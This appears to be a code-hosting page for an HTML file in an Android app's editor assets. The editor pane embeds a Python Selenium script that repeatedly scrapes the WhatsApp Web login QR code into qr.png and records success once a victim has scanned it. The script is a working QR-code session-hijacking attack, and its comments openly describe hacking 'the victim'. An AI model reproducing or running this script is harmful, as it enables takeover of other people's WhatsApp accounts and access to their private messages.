-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy path.grabber.py.tmp
90 lines (82 loc) · 3.25 KB
/
.grabber.py.tmp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>ACE Autocompletion demo</title>
<style type="text/css" media="screen">
body {
overflow: hidden;
}
#editor {
margin: 0;
position: absolute;
top: 0;
bottom: 0;
left: 0;
right: 0;
}
</style>
</head>
<body>
<pre id="editor">import base64
import os
from time import sleep
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
browser = webdriver.Firefox() # init browser
browser.get("https://web.whatsapp.com/") # open whatsapp web
# wait up to 10 secs until the qr code is loaded and get it
img = WebDriverWait(browser, 10).until(
EC.presence_of_element_located((By.XPATH, """//*[@id="app"]/div/div/div[2]/div/div[2]/div/img""")))
src = img.get_attribute('src') # the qr is a png encoded in base64
if os.path.isfile('hacked'): # if this file exists, then we hacked the victim
os.remove('hacked') # so, to restart the attack, we delete it
while True: # we need a loop because the qr code will change every x seconds
try:
# after a while, whatsapp web will ask you to reload the qr code if no connection was attempted
# this will handle the situation clicking on reload whenever necessary
reloader = browser.find_element_by_xpath("""//*[@id="app"]/div/div/div[2]/div/div[2]/div/span/div""")
reloader.click()
print("reloaded")
except:
pass
try:
img = WebDriverWait(browser, 1).until(
EC.presence_of_element_located((By.XPATH, """//*[@id="app"]/div/div/div[2]/div/div[2]/div/img""")))
new_src = img.get_attribute('src')
except: # if there is no qr code, then we successfully hacked the victim
with open('hacked', 'w') as f: # let's write a file named hacked to keep track of this
f.write('')
break # ...and we exit (the browser will still be open)
if new_src != src: # if there is a new qr code, rewrite the existing one
src = new_src
b64png = str.encode(src.replace("data:image/png;base64,", ""))
with open("qr.png", "wb") as f:
f.write(base64.decodebytes(b64png))
print("new qr")
sleep(1)
print("Hacked!")</pre>
<!-- load ace -->
<script src="file:///android_asset/src-noconflict/ace.js"></script>
<!-- load ace language tools -->
<script src="file:///android_asset/src-noconflict/ext-language_tools.js"></script>
<script>
// trigger extension
ace.require("ace/ext/language_tools");
var editor = ace.edit("editor");
editor.session.setMode("ace/mode/c_cpp");
editor.setShowPrintMargin(false);
editor.getSession().setUseWrapMode(true);
var code = editor.getValue();
//editor.setValue("new code " + code);
//enable autocompletion and snippets
editor.setOptions({
enableBasicAutocompletion: true,
enableSnippets: true,
enableLiveAutocompletion: true
});
</script>
</body>
</html>